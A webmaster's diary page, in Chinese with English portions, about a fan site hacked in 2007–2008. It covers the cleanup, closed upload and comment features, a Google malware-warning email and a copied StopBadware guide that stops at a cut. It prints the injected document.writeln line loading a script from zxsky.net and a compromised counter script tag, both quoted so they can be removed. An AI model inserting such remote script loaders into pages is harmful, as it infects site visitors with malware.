主页--->m-master-000-->m-master-015
EN

站长手记-015 目录(手机版)

个人简况
韩文光
简要信息:1937年生于天津. 1954年毕业于北京化学工业学校并分配到南京化学工业公司(原永利宁厂)工作.1954-1974年历任见习生,值班工长,车间主任, 设计科长, 氮肥分厂付厂长兼总工程师等职,1974-1984年在南京栖霞山化肥厂参加引进大化肥建设并担任第一任厂长.1984-1997年奉调在中石化(南京)金陵石化公司任副总经理..1991年在江苏省干部函授学院毕业获大学本科学历, 教授级高工。著有“化工装置实用操作技术指南”一书。1997年退休。出于对莫里康内作品的喜爱,于2003年创办“莫里康内爱好者”网站。2009年被推举为“莫里康内爱好者联谊会”名誉会长。2012-2023年主编出版“莫里康内爱好者手册”(全集1-3卷)及“莫里康内珍罕卷”,面向全球发行,其中第1卷已被中国图书馆作为文献资料收藏
本站编辑团队 >>>>>>
个人喜好: 读书,集邮,音乐,手风琴,游泳,退休后学习外语,钢琴,电脑,建立网站 ...
E-mail: qilingren@163.com
遭遇黑客
Be hit by the hackers
 
这已经是第2次了.第1次发生在2005年.不过那一次影响很小,而这次却大不一样!
2007.12.23.在打开网站主页时,跳出来病毒提示.当时我并没太在意,因为过去也有偶尔的现象,都是误判.没想到这次是真的来了.网页接连被提示有毒,(见图1).而且有的网友打电话,发邮件,告诉我网站出现病毒(图2),我不得不认真的对待了
图1
图2
2007.12.23.在打开网站主页时,跳出来病毒提示
2007.12.23.在打开网站主页时,跳出来病毒提示
首先检查网页,在Dreamwerver(以下简称DW)编辑器中打开主页,在后台仔细观察代码,一个主页代码就有几千行,看起来还真是累人.换一种办法试试吧,先把正常的页面删除,留下一小部分代码上传试验,几次反复,还算顺利,很快就锁定了那个坏蛋,原来它就躲在最后一行(见图3).这是一个带毒网站的地址.你只要把那个http的地址写到到IE浏览器,一打开就会有病毒提示了(如您要试验一定先保持您的杀毒软件是正常的)
图3
几次反复,还算顺利,很快就锁定了那个坏蛋,原来它就躲在最后一行(见图3).这是一个带毒网站的地址.你只要把那个http的地址写到到IE浏览器,一打开就会有病毒提示了
倒底有多少网页中了毒我还不得而知,只好把网页下载回来全面杀毒.起初我不敢肯定杀毒软件能找到这些代码,(后来经试验证明瑞星是可以对付这类代码的)所以只好用DM的查找与替换功能,这个功能很好,很快就找出并删除了70多个网页的病毒代码.在重新上传了这些网页之后网站又恢复了平静,我还很高兴,以为问题已经解决了!
事实证明我完全低估了黑客的贪婪和它的严重危害.第二天,在打开网页时又出现了病毒的提示.我以为还是那个代码在作怪,我重新下载并在DW中打开主页代码检查,见不到那个代码.这使得我很头疼,这个毒源在哪里呢?想来想去,我想起了2005年那一次中毒,这一次会不会又故技重演呢?我赶忙打开那个小小的脚本文件,这个文件只有几行代码,用眼一看,真地又发现了那一段新添上的病毒代码(见图4,上面7行是原有的,双虚线上面的第8行是被黑客写入的)
图4
几次反复,还算顺利,很快就锁定了那个坏蛋,原来它就躲在最后一行(见图3).这是一个带毒网站的地址.你只要把那个http的地址写到到IE浏览器,一打开就会有病毒提示了
这是一个后缀为.js的脚本文件,它是为主页上一个自带的播放器而设置的,主页上所有的在线播放乐曲,都是在它的指挥下进行的.这个播放器既小巧又美观,我一直很喜爱它,所以2005年中毒以后我也没舍得动它.没想到,这次又成了黑客的盘中美食.思量再三,这次还是暂时把它取消吧,主页改用普通客户端常用的WMP播放器.好在经过两三年的时间,这种播放器已经很普及了,应该不会对访问者带来麻烦.音乐文件都还保留着,今后如果有了好的防范对策可以很快地恢复.
这次检查虽然顺利,但我的思想变的沉重起来.黑客会不会就此罢休.就我的这一点电脑水平而言,我能是黑客的对手吗?更严重的是它的影响已经出现了,到第三天,我发现网站的访问量持续的急剧下降.原来每天一般都在800-1400之间,而这两天突然锐减到500以下,最低时只有380(见图5)
图5
,我发现网站的访问量持续的急剧下降
 
我一下子还没弄明白为什么下降这么多?我怀疑是不是服务器那边出了什么毛病?我打电话给ISP,将这个问题告诉了他们并询问他们那里的情况.他们告诉我那边情况正常,还没有发现其它网站被黑的情况,可能是我的网站存在漏洞造成的.另外,根据他门的经验,一旦网页上出现病毒,很容易被搜索引擎标上印记,提醒访问者小心,这样很容易造成访问量的急剧降低.他门要我到搜索引擎上看看.
真是不看不知道,一看吓一跳.我们的网站已被GOOGLE标注为有毒的网站-"该网站可能含有恶意软件,有可能危害您的电脑"(见图6)
图6
我们的网站已被GOOGLE标注为有毒的网站-'该网站可能含有恶意软件,有可能危害您的电脑'
再打开国外各种不同语言的GOOGLE,英国,法国,美国,加拿大,俄罗斯,日本,香港,巴西....无一例外地都被打上了这恼人的印记(见图7)
图7
英国 UK
俄罗斯 Russia
上: 英国 UK
上: 俄罗斯 Russia
美国/加拿大 USA/Canada
日本 Japan
上: 美国/加拿大 USA/Canada
上:日本 Japan
巴西 Brasil
沙特 Saudi Arabia
上: 巴西 Brasil
上: 沙特 Saudi Arabia
哦,到此我才恍然大悟,原来这罪魁祸首全是这个害人的黑客.我们这个小小的网站,在全世界几千万个网站当中,只不过是大海中的一滴水,茫茫草原中的一棵小草.经过五年的努力,ALEX排名也仅在30万左右.其性质仅是一个个人网站而已.虽不敢自詡为无私奉献,但至少也算是公益之举.这黑客没有本领去碰那些为富不仁,欺世盗名的霸主,却拿我们这样的弱者来连连开刀,说句白话,实在是太"缺德"了.
人被逼到墙角总是要反抗的.我首先找到了中国互联网违法和不良信息举报中心(http://net.china.cn/index.htm)举报这些不义之徒,请求他们查清源头,维护公德.接下来,我得考虑首先还是要立足自身,扎紧篱笆,防范野狗.我找了ISP的技术人员和我们的技术顾问WESTP,他们都给出了很好的建议.下面是WESTP朋友的一个邮件
播放器的代码文件我看了,其实很简单,与上次的情况一样,病毒在这个脚本文件的最后一行加入了一行代码,意思是去下载一段Javascript脚本,正是那个脚本含毒。

所以,只需要把最后一行删除即可。代码如下:
________________________________________________________
function play(MediaFile)
{
var
MediaFilePath='../ListenOnLine/';
player.URL=MediaFilePath+MediaFile;
player.controls.play();
}
document.writeln("<script src=http:\/\/zxsky.net\/2.js><\/script>"); 这一行有问题!删除即可。
________________________________________________________
关于彻底解决此类问题,主要依赖于3点:
1 我们自己的机器:如果我们自己的机器有毒,上传的网页文件含毒也就不奇怪了。
2 服务器上的安全防护程序:服务器上不能的病毒驻留,否则我们上传的网页即使是干净的,一传上去就会被感染。
3 服务器的运行的论坛、博客等系统的安全性。这也就是我上次建议我们手工在数据库中修改附加文件的路径,之后手工重新发布,而不大规模修改博客系统代码的原因。一个系统的安全性依赖于很长时间的积累与完善,非一朝一夕能成。

就目前来说,实现第1、2点,已经能防住绝大多数病毒了,并且对第3点问题的解决,也是很有帮助的。

从各方面的意见来看,要想防范黑客,最重要的是要堵死网站可能存在的漏洞,含有脚本和ASP代码网页的写入功能是最容易产生漏洞的部位,也是黑客侵入的首选渠道.这个网站的唯一脚本网页一开始就取消了,剩下来就是ASP网页的问题.几年来,为了网友的方便,这个网站增加了不少的ASP互动功能,如各种留言本,包括要求下载的留言,确实受到国内外朋友的喜爱,一年多来,已为近200位朋友提供了约500项作品的下载.还有ASP上传,作品评论等等.取消这些功能的确让人心痛.我思考再三,保留固然很好,但就我们这个小小网站的技术水平和我个人这把年纪的防范精力而言,是很难和那些随时磨刀霍霍的年轻黑客相抗衡的.相对网站的长期安全运行而言,就是从广大访问者的利益出发,也还是舍小保大,丢卒保车为好.何况现在电子邮件也很方便.为了安全便利,最近又在网站空间内开辟了一个站长邮箱 qilingren@163.com 经试用效果也很好,虽然比起在线互动略有不便,但也不会带来太多的困难.最后,决心已定.把所有这些ASP功能一律取消,希望能堵死漏洞的源头,确保网站的平安.为此并在各相关部位发布了以下通告:
本站重要通告
本站互动功能开办年多来,深受网友的喜爱,已先后为国内外二百多位朋友提供了500多项下载及其它服务,但自2008年伊始,本站即遭受到不明黑客的连续攻击(详见此页),任意在网页中写入恶意病毒代码.虽经多次删除并修改部分脚本及写入功能,但仍未彻底解决,从而导至世界各大搜索引擎以各种语言宣示本站网页有毒,造成访问者怯而远之,访问量急剧降低.本站虽已向中国互联网违法和不良信息举报中心作了举报,但一时仍难奏效.鉴于本站系个人公益性网站.没有充足的精力和技术应付这一类日益猖獗的严重干扰,为了保证网站的长期稳定安全运行和访问者的长远利益,自即日起本站不得不关闭所有的包括留言本,评论,要求下载留言,英文论坛以及ASP上传等所有写入功能,并作如下通知
1.所有网友如有任何要求或留言,请通过电子邮件发送给本站.如有留言类的内容请于注明,本站将专门设置一个网友留言网页由本站如实编辑上传
2.如有需要上传文件,一般4M以下均请使用电子邮件. 大于4M的文件可以分割后,发送或用电子邮件告知本站,我们们将为您另外提供一个专用通道上传
3.对于要求下载的朋友,也请使用电子邮件.为了网友之间的的友好交流,请您在来件的同时附上一张您的所在的城镇风景照片(请注明您的城镇地名)或是一张您的个人照片,本站将连同您的电邮地址和照片一起在专页上发表并于回复.如您的电邮地址要求保密请在邮件中注明,本站将只发布照片和您的电邮@前面的户名(不含地址),谢谢您的合作
 
A urgent notice
The web site has sufferted hackers' continuous attack for many times from 2008 beginning(See the page). It has leded sharp reduce of visiting quantity. Because this is a personal site, so difficult lastly and effectively to resolve these problem, for the sake of safety of the web site and webfriends' benefit, we have to close all write function of the guestbook, comment, English forum, A message for request download and ASP upload etc. from today, and announce below
1. Please use the E-mail for all request and message
2. If you need to upload less 4M file, please use the E-mail. For more 4M file, you can split it for upload. Or please inform to us using the E-mail, we will provide a special channel for your upload
3. For request download music and movies, please use the E-mail. For the sake of friendship exchange between web friends, please enclosed a photo of city or town you live in (please note its name) , or your personal photo. we will publish it in a special page with our reply. If your E-mail address need to be secrecy, please tell us, we will only publish the head part before @ (without address). Thanks for your cooperation!
 
实践证明,下这个决心还是对的.就在我清理ASP程序的过程中,下载了那个ASP上传功能的两个网页,经过杀毒,果然又在这两个ASP文件中发现了传上来的病毒(见图8).这个漏洞如果不消除,这个"肉鸡"黑客肯定还会继续来吃的.至于网站还有哪些漏洞,真是一下子很难弄明白,只好静观其发展了.....
图8
这几天下来,确实把人搞的心神不定,坐卧不安.更严重的是,三个域名中已有两个发出了警告,如果这个问题解决不了,整个网站都有全军覆没的可能.一段时期以来,为了方便网友的互动,增进大家的交流和友谊,本站先后开辟了论坛(俱乐部),博客群等功能,为网友提供一些条件,但由于所用的软件均取自网上,可能存在不少漏洞,确实带来了受攻击的可能性.(事实上论坛和博客均已先后遭受过严重的搔扰,包括未经批准自行在博客群中登录开辟帐户,发布广告等等问题)这互联网技术日新月异,高深莫测,就连大名鼎鼎的微软也天天忙着堵漏洞,打补丁,我们这小小的网站就更难说了.我已向瑞星等知名杀毒门户求援,但他们对这类网站的救援能力似乎也有所限度,表示只能提供咨询,但不能保证.怎么办?想来想去,还是国际歌上的那句老话,最后全靠自己救自己.互联网目前是这样的的混乱,(从中国互联网违法和不良信息举报中心公布的数字来看,目前每个月举报的数字大约在2万件,比2006年差不多翻了一倍,平均每天就有700件之多,我不知道这个中心有多少工作人员,他们能消化掉这铺天盖地一样的违法和犯罪行为吗?我们只有拭目以待了!)我们还不得不下最大的决心,考虑中止包括论坛,博客在内的所具有写入功能的程序的运行.这当然是一个痛苦的决定,特别是许多网友花费了大量心血,精力,发表了那么多的优秀作品,这样作的影响是可想而知的.但为了网站的生存发展,也许不得不忍受这断腕之痛了.为了尽可能保存多年来上百位网友在论坛,博客所发表的精彩文章,我们准备今后将其中重要的文章重新整理出来,在网站中开辟一个博客,论坛网友的个人专栏,逐步利用WEB网页保存和发布这些文章.同时,本站已在博客和论坛发布了紧急公告,还向各位有关朋友发去了电子邮件,准备在几天后彻底关闭这些程序.请朋友们作一点思想准备,抓紧时间自行保存重要的文件,共同努力来度过这个难关.
 
 
关于黑客
有了这几天的焦灼经历,我自然对黑客也更加关注,我在百度百科上查找了一下"黑客",这是很长的一篇文章,以下仅摘录其黑客的定义部分
百度百科关于"黑客"的定义 (见此页)

一.什么是黑客

在力求当一个黑客前,我们要先了解什么是黑客
Hacker -- 黑客
热衷研究、撰写程序的专才,且必须具备乐于追根究底、穷究问题的特质。
在黑客圈中,hacker一词无疑是带有正面的意义,例如system hacker熟悉操作系统的设计与维护;password hacker精于找出使用者的密码,若是computer hacker则是通晓计算机,可让计算机乖乖听话的高手。
黑客基本上是一项业余嗜好,通常是出于自己的兴趣,而非为了赚钱或工作需要。
根据开放原始码计划创始人Eric Raymond对此字的解释,hacker与cracker是分属两个不同世界的族群,基本差异在于,hacker是有建设性的,而cracker则专门搞破坏。
hacker原意是指用斧头砍材的工人,最早被引进计算机圈则可追溯自1960年代。
加州柏克莱大学计算机教授Brian Harvey在考证此字时曾写到,当时在麻省理工学院中(MIT)的学生通常分成两派,一是tool,意指乖乖牌学生,成绩都拿甲等;另一则是所谓的hacker,也就是常逃课,上课爱睡觉,但晚上却又精力充沛喜欢搞课外活动的学生。
这跟计算机有什么关系?一开始并没有。不过当时hacker也有区分等级,就如同tool用成绩比高下一样。真正一流hacker并非整天不学无术,而是会热衷追求某种特殊嗜好,比如研究电话、铁道(模型或者真的)、科幻小说,无线电,或者是计算机。也因此后来才有所谓的computer hacker出现,意指计算机高手。
对一个黑客来说,学会入侵和破解是必要的,但最主要的还是编程,毕竟,使用工具是体现别人的思路,而程序是自己的想法.一句话--编程实现一切!
对于一个骇客来说,他们只追求入侵的快感,不在乎技术,他们不会编程,不知道入侵的具体细节.
"黑客"在人们脑中的形象就是一个蓬头乱发,戴着高度眼镜,驼着背弓着腰,成天趴在电脑面前的人.其实黑客和正常人一模一样,他们并无什么特殊之处.有些人也许很少上电脑,成天运动,工作,但他们的技术和精神已经达到的黑客的标准,有些人天天爬在电脑前,到处瞎混,但他们仍不是黑客.
人们总是认为黑客就是破坏者,其实从某种意义上来说,黑客也在为计算机技术的发展做出很大的贡献.如果没有高明的黑客,就没有资深的网管;如果没有完美的木马,就没有杰出的杀毒软件;没有了黑客,网络技术就很难发展下去.当然,网管其实也是黑客,如果他不知道别人怎么进攻,自己要怎么防守呢??
黑客一词在圈外或媒体上通常被定义为:专门入侵他人系统进行不法行为的计算机高手。不过这类人士在hacker眼中是属于层次较低的cracker(骇客)。如果黑客是炸弹制造专家,那么CRACKER就是恐怖分子.
现在,网络上出现了越来越多的Cracker,他们只会入侵,使用扫描器到处乱扫,用IP炸弹炸人家,毫无目的地入侵,破坏着,他们并无益于电脑技术的发展,反而有害于网络的安全和造成网络瘫痪,给人们带来巨大的经济和精神损失.

我们不能做Cracker,我们要力求当HACKER!!

从百度的文章中,我们已可以对黑客有一个大概的了解.下面我想结合这几天的遭遇对黑客们写上几句:
黑客黑客 有侠有恶
侠者艺高 助人为乐
不扰平民 天高地阔
劫富济贫 拔刀除恶
我劝学子 有志为国
展翅虚拟 先立道德
欢迎更多的朋友们为本站献计献策,保障网站的安全,以便能更好地为大家服务.对于目前及可能采取的措施,也请大家给于谅解与合作.
2008.1.6.
 
一波未平,一波又起
中国老话"祸不单行,福不双至",这句话常常被说中.我相信它并不是迷信,我想这大概是古人应用概率理论的一个范例.这不,才过了几天平安日子,警告又来了,不过这次首先是来源于中国电信(江苏)的一个网上查毒业务.2008.1.11.当我打开网站时,下面一个警告网页又突然跳了出来
中国老话'祸不单行,福不双至',这句话常常被说中.我相信它并不是迷信,我想这大概是古人应用概率理论的一个范例.这不,才过了几天平安日子,警告又来了,不过这次首先是来源于中国电信(江苏)的一个网上查毒业务.2
网站刚刚处理好,怎么又冒出病毒来,莫非这病毒也学习了非典的招术,还有潜伏期?好在江苏电信的10000号服务电话很好用,我拿起电话找到了他们,转了几个弯,终于找到了管这个业务的技术人员,他在检查了网页之后告诉我,可能是由于网页中调用了某个插件带来的反应.我希望他门能告诉我是哪个插件,他说这已不在他们的业务范围之内了.
接下来我又一次被推向思索之谷.当一个人被逼着去作一件他所不熟悉甚至不了解的工作而又感到茫然无助的时侯,他的心情往往是很沮丧的.特别是在我这样的年纪更会出现这种感受.这样搞网站实在是太吃力了.不过既然上了网络这条船,那也只有拼到底了.我再次打开网页,删去正常的内容,仔细地一行一行地查看,没发现甚么特殊的迹象,我又陷入了沉思,回想10000号的回答,插件,调用?....谁在调用,我忽然想起为了对网站发展进行更多的研究而加入的多个免费统计代码,每次打开网页时,它们是会自动连向那几个免费的统计程序的.不过我选用的都是些有名的大站,最早的太极链,以后又陆续加入的ITSUN,51LA,还有一个国外的知名网站Extreme,难道它们会有问题?"实践是检验真理的标准",这句从毛泽东时代学来而又在其后第二代到第四代领导人一再强调的话,也是我一生行事寻源的一个百试百灵的法宝.我将这几个代码中所调用的URL 一个一个地粘贴到IE浏览器中回车查看,真有点出乎意料,在打开太极链的URL http://vip6.t2t2.com/visit.js 同时,那个警告就又跳了出来
这就是那段导至报毒的代码
<script language=javascript src="http://vip6.t2t2.com/visit.js"></script>
这段 java script 语句的含意并不复杂,它的意思就是当其所在网页被打开时,这个 http://vip6.t2t2.com/visit.js 网址和相应的程序将被自动执行.哦,毒源终于找出来了!
为了验验证这个发现的可靠性,我又在GOOGLE中输入了t2t2四个字,在搜索结果中的确出现了不少和我的网站一样的被GOOGLE标为有毒的网站
为了验验证这个发现的可靠性,我又在GOOGLE中输入了t2t2四个字,在搜索结果中的确出现了不少和我的网站一样的被GOOGLE标为有毒的网站
为了验验证这个发现的可靠性,我又在GOOGLE中输入了t2t2四个字,在搜索结果中的确出现了不少和我的网站一样的被GOOGLE标为有毒的网站
为了验验证这个发现的可靠性,我又在GOOGLE中输入了t2t2四个字,在搜索结果中的确出现了不少和我的网站一样的被GOOGLE标为有毒的网站
为了验验证这个发现的可靠性,我又在GOOGLE中输入了t2t2四个字,在搜索结果中的确出现了不少和我的网站一样的被GOOGLE标为有毒的网站
 

其中特别是"天下收藏"和"游戏下载站网址",都是直接使用t2t2.com的二级域名,这更使人确信无疑了.

当然,这并是说t2t2就是制毒者,也许它也是受害者,但无论如何我必需把这个情况立即通知这个网站.我找到太极链的主页 http://www.textclick.com/ ,查看它的联系方法,上面有电话和QQ号码,我拨打电话,无人接听,再上QQ,也是无人应答.膸想起来了,这是星期六,大概无人值班,我只好等到周一再说了.
接下来,我必许采取果断措施,删除这一段代码.不过这可不是一件容易的事,这代码分散在全站几千个网页之中,而且很多网页,特别是那些RM格式的导向网页,是和很多RM大文件放在一起的,为了万无一失,需要把每个文件夹打开把它们完全下载回来,检查清除之后再重新上传.1月14日下午,我把这个情况通报给ISP的经理,他听后告诉我,不只太极链有问题,而且另一家有名的统计站点ITSUN前不久也被黑了.恰恰,我的网页也在使用这个统计,不过这些天我已发现这个网站关闭了,不知是何原因.现在才知道,原来它也成了黑客的受害者.没有别的选择,我只好再重新把所有ITSUN的代码完全删除.为了这件事前前后后总计花了五天时间,的确让人感到心力交瘁了.
1月14日,星期一上午我终于通过QQ和太极链的客服取得了联系,以下是我们的交谈记录
星期一上午我终于通过QQ和太极链的客服取得了联系,以下是我们的交谈记录
星期一上午我终于通过QQ和太极链的客服取得了联系,以下是我们的交谈记录
星期一上午我终于通过QQ和太极链的客服取得了联系,以下是我们的交谈记录
 
 
尽管这几天非常疲劳,但为了全国众多和我一样受其影响的网站站长的利益和需要,我还是想把它写出来以和大家共享.当然我也更希望太极链能尽快查明原因,采取措施,并应向全国的广大用户作出解释.
 
好了,这个网页也够长了.我也需要有一段适当的休息.不过"困难和挫折教训了我们",除去本站自行采取的必要措施之外,我想有几点教训是每位站长(特别是非专业人员所主持的网站)所应当吸取的:
1.尽量少用具有互动和写入功能的类似ASP.PHP等类型的程序.例如聊天室,留言本,评论,论坛,在线上传,博客等等.如果要用,您必须要具备防黑客入侵的能力.如果没有或者缺乏这种能力,建议您取消这种程序,就象本站这次下决心所作的一样,改以E-mail等传统的间接方式保留互动渠道
2.尽可能地少用外部链接.包括外部免费的统计功能.特别对于现在很流行的免费小插件,甚么天气预报,IP显示,流量联盟之类的代码,决不要任意放入您的网页.要用也一定要选那些知名大站提供的程序以减少被其毒害的几率.例如,最近本站新加入的Google分析工具代码,实际上是一个很高级的统计功能.一般来说,应当可以放心的使用(当然,也不可能绝对排除它受攻击的可能)
3.选择信誉度高,功能齐备的ISP服务商.新型的虚拟主机都已加入了许多防黑客的功能,如关闭FSO功能,关闭ASP/PHP功能,关闭写入功能等等.有选择的使用这些功能对于保障网站的安全是很有好处的
 
2008.1.16 追补
 
2008.2.3.后记
经过近一个月的艰苦努力,这次黑客风波总算平息了,一月下旬以后,再也没有出现过任何病毒的信息,我也终于能够松一口气了.不过还有一件未了问题,那就是GOOGLE的报毒提示仍然如故,未见改正.
我知道GOOGLE有一个申报重新审核的功能.不过既然病根已除,我也就心中坦然了.GOOGLE改不改应该是他们的事,一是由于我手中积累的事情太多,不想再花更多的时间老陷在这件事中;二是我也有意的想看看GOOGLE处理这件事情的规则和效率,他们总应该有一个自行收场的办法,否则,长期给好人(包括已改过自新的人)戴上一顶坏人的帽子,总会有人要和他打官司的.
不出所料,2008.1.30日,我的站长邮箱qilingren@163.com 接到了一封电子邮件,我仔细一看,这是一封以 Google Search Quality Team 暑名的来件,这个邮件共有8个以@morricone,cn为后缀的发送地址,如 admin@morricone.cn, contact@morricone.cn 等等.尽管这封信似乎来的太晚了一点(GOOGLE是在2007.12.24,也就是一个多月以前,宣布我的网站带毒的)但由此也可见GOOGLE的良苦用心了.邮件的内容如下:
 
2008.1.30. Google Search Quality Team 暑名的来件
Dear site owner or webmaster of morricone.cn,

We recently discovered that some of your pages can cause users to beinfected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.Below are some example URLs on your site which can cause users to be
infected (space inserted to prevent accidental clicking in case yourmail client auto-links URLs):

../
../master/master-015.htm
../englishweb/engmovies/e-engmovies-004a.htm

Here is a link to a sample warning page:
http://www.google.com/interstitial?url=http%3A//morricone.cn/

We strongly encourage you to investigate this immediately to protectyour visitors. Although some sites intentionally distribute malicioussoftware, in many cases the webmaster is unaware because:

1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious advertiser

If your site was compromised, it's important to not only remove themalicious (and usually hidden) content from your pages, but to alsoidentify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a
resource page for securing compromised sites:
http://www.stopbadware.org/home/security

Once you've secured your site, you can request that the warning be removed by visiting
http://www.google.com/support/webmasters/bin/answer.py?answer=45432
and requesting a review. If your site is no longer harmful to users,we will remove the warning.

Sincerely,
Google Search Quality Team

译文: 亲爱的morricone.cn网站所有人或管理员:

近日我们发现您的一些网页可能引起用户被其所带有的恶意软件所感染.我们已经开始对通过GOOGLE搜索结果来访问这些网页的访问者出示了一个警告页.下面是一些这类网页的URL地址:(为防止您的E-mail程序意外地自动链接到这些地址,我们已在其中插入了空格)

http://morricone .cn/
http://morricone .cn/master/master-015.htm
http://morricone .cn/englishweb/engmovies/e-engmovies-004a.htm

以下是我们的警告页的一个样例: http://www.google.com/interstitial?url=http%3A//morricone.cn/

我们强烈地敦促您立即去调查这个问题以保护访问者.由于有些站点故意地散布这些恶意软件,在很多情况下,(被其毒害的)网站站长对此却并不知情,这是因为:

1)该网站也是被害者
2)该网站没有对恶意软件散布者的监视
3)该网站链接了一个带有恶意软件的广告

如果您的网站已经被毒害,不仅需要从您的网页中移除这些恶意软件(通常它们是隐蔽的),更重要的还要确定和修补这些易受攻击的漏洞.如果您不知道怎样去进行,我们建议您联系您的主机提供者.为了保护您的网站免受毒害,还可以参阅一个资料网页: http://www.stopbadware.org/home/security

一旦您的网站已经得到了安全保护,您可以访问 http://www.google.com/support/webmasters/bin/answer.py?answer=45432 去要求重新检查您的网站并移除警告.如果您的网站不再对用户有害,我们将移除这些警告

GOOGLE搜索品质小组

随后,笔者浏览了这个资料网页 http://www.stopbadware.org/home/security 这是一个内容很长的英文网页,主要是叙述如何检查和防止网页中毒,现将其内容复制于后
Tips for Cleaning & Securing Your Website
This page is a starting-point resource -- one we expect to evolve and grow over time -- to provide webmasters with tips for ways to remove badware from your website and to keep it free of badware. Please note that this resource is by no means comprehensive or exhaustive, and is intended only as a first step for webmasters concerned about badware. We encourage webmasters and hosting providers to research website security independently, beyond the suggestions offered here. It is the responsibility of individual webmasters and hosting providers to stay informed of news relating to website security issues.


There are three basic steps to maintaining a clean site:

Identifying badware on your site Removing badware from your site Preventing badware in the uture
Identifying badware on your site. The first step to keeping your website badware-free is to check for any badware that may already be on your site. Badware is software that fundamentally disregards a user's choice over how his or her computer will be used. Some applications are badware because they act deceptively or irreversibly (for example, an application that secretly installs spyware or that is difficult or impossible to uninstall). Other applications are badware because they have objectionable behaviors (such as displaying pop-up ads or changing a user's homepage) without fully and prominently disclosing those behaviors to the user in advance and seeking his or her consent. You can learn more about badware in our Software Guidelines.

Here are some common types of badware to look for:

1. Badware available for download on your site
Evaluate the software that you are offering for download -- including any third-party applications that are bundled with your software -- based on StopBadware's Software Guidelines. If the software that you are offering for download violates our guidelines, then it constitutes badware.

If your software is bundled with third-party applications, you may also want to check whether the bundled applications install any dangerous or deceptive code. One method for detecting this is to download the entire software bundle onto a virtual machine and scan it using anti-virus or anti-spyware programs.

2. Badware available on sites that you link to
If your website links to badware, your site's visitors may be in danger, even when the bad software or code exploits are not actually hosted on your site. Your web pages may violate our Website Guidelines if they automatically redirect to a website that hosts or distributes badware; directly link to executable files that are badware; link to another website that automatically attempts to install badware by exploit onto the user's computer; or contain substantial links to other website(s) that predominantly host or distribute badware.

Some ways to determine whether the links on your site violate our guidelines would be to check whether any of your links lead to bad software available for download on another site, or whether they lead to an infected page on another site. (We recommend that, when looking for badware, you use a virtual machine to avoid damaging your own computer.) It may also be useful to search through your site's source code and look for links to unknown sites, especially if the links are to executable files. Executable files include files with extensions such as .exe, .bat, .cmd, .scr, and .pif. There are also applications available that will allow you to scan for malicious links within a web page, and you can use these applications to help decide whether to link to that page.

You can also use the StopBadware reports and our Badware Website Clearinghouse as a resource -- search our database for information on the sites and software to which you link or are planning to link.

3. Badware distributed through ads running on your site
Advertising displayed on your site is another potential source of badware, since most ads include direct links to an external web page. Please see section 1.2 above for general information about our guidelines for badware found via links. If you display third-party ads on your website, check that the links do not lead to bad software or to a badware-infected web page. The methods for evaluating the software that is available through ads are similar to those described in section 1.1 above ("Badware available for download on your site").

You can use the StopBadware in-depth reports and our Badware Website Clearinghouse as a resource. Check the ad networks you are considering using in our database to learn whether other websites have had badware problems with those ad providers.

4. Badware links posted in user-generated areas of your site
If there are any areas of your site where users can post or upload content, these areas may be a potential source of badware or badware links. Please see sections 1.1 and 1.2 above for information about badware and badware links.

5. Hacking attacks to your site
Another common source of badware on websites is hacking attacks, which allow third parties to insert code or executables onto poorly secured websites. A common example is the "injection attack," in which a hacker uses a security vulnerability to inject harmful code into one of your web pages. Usually this code will be invisible on your site to you and to any site visitors, but will trigger the download of badware in the background of a visitor's computer. You can often detect whether this kind of attack has occurred by looking at the source code of your web pages and determining whether it contains any code that you did not place there.

Two common types of "injection attack" are:

Invisible iframes
Iframe tags are a kind of HTML tag. An iframe creates a small "window" on a webpage so that another webpage can load within the embedded window. Iframes are not always used for nefarious purposes; one frequent use, for example, is to embed a video into a blog post. When used by malicious hackers, an iframe can be made so small that it is invisible, and the visitor to the infected web page never knows that another page is also loading in the tiny iframe window. If you see code for an iframe with width="0" and height="0" in the source code of any page on your website, you have found an invisible iframe. Iframes are most commonly inserted at the very top or the very bottom of a web page's source code. A good first place to check for iframes is before the initial <html> tag that starts a web page's standard code, or after the final </html> that ends a page's code.

Obfuscated Code
Obfuscated code or scripts are designed to be hidden within the normal code for your site, so they can be hard to detect. The code is written specifically to prevent automated tools from discovering its purpose. Obfuscated code is not necessarily badware; some legitimate coders obfuscate in order to prevent others from copying their work. However, if you write the code on your site and you do not intentionally obfuscate, finding a block of obfuscated code may indicate an injection attack. The two most common ways code is obfuscated are through encoding and encrypting.

Encoding can sometimes be easy to spot because the encoding uses either "hex" or "unicode/wide" characters. For hex characters, you will see strings of javascript code that consists of percent signs with two character combinations after them (e.g. %AA%BB%CC). For unicode characters, you will see strings that consist of "\u" with four characters after (e.g. \u0048\u0069\u0021). Generally, blocks of code that have been encoded in this fashion will take up several paragraphs. If you find large blocks of text in your web page source code with either of the above patterns, it is likely to be obfuscated code.

Encrypted code is harder to find, because there are no set patterns. However, encrypted code will look like a block of unintelligible text. Even if you are not familiar with javascript coding, you will notice that normal javascript code on your site will use a syntax based on actual English words. Encoded or encrypted text will look like completely unintelligible blocks of letters, numbers, and symbols. Check your web logs for references to executable files that you don't recognize. Executable files include files with extensions such as .exe, .bat, .cmd, .scr, and .pif.

While most hacking attacks focus on html code, it is also possible for bad software itself to be uploaded onto a poorly secured site. Bad software can include unknown executables (such as files that end in .exe, .bat, .cmd, .scr, and .pif), javascript files, or even images uploaded to your site without your knowledge. Sometimes attackers will simply use your website to host badware and link to it from other victim sites. One method for detecting whether you are hosting bad software on your site is to download all of your source code from the live website onto a virtual machine and scan it using an anti-virus or anti-spyware program.

Removing badware from your site
How you should go about removing badware from your site will depend on what kind(s) of badware your site is hosting or linking to. Our general recommendation is to take your website offline while you clean and secure it, to prevent your site's visitors from being unwittingly infected in the interim.

1. If your site is hosting bad software for download
Remove the bad software from your website and don't make it available for download again unless you can be sure that it is no longer badware. You can learn more about what makes a piece of software badware in our guidelines. If you are the creator of the software in question, StopBadware may be able to offer recommendations for bringing your software into compliance with our guidelines.

2. If your site links to badware
Remove all badware links from your website.

3. If ads on your site are linking to badware
Remove all ads that link to badware. If you use an ad network, this may mean removing all the network's ads from your site until you can be sure the network is clean. You may also want to contact your ad provider and let them know that one or more of their ads is causing badware to be linked from your site.

4. If badware is linked in user-generated areas of your site
Remove the badware links from your site. This may involve editing user posts to remove the badware content, or deleting entire user posts.

5. If your site has been hacked
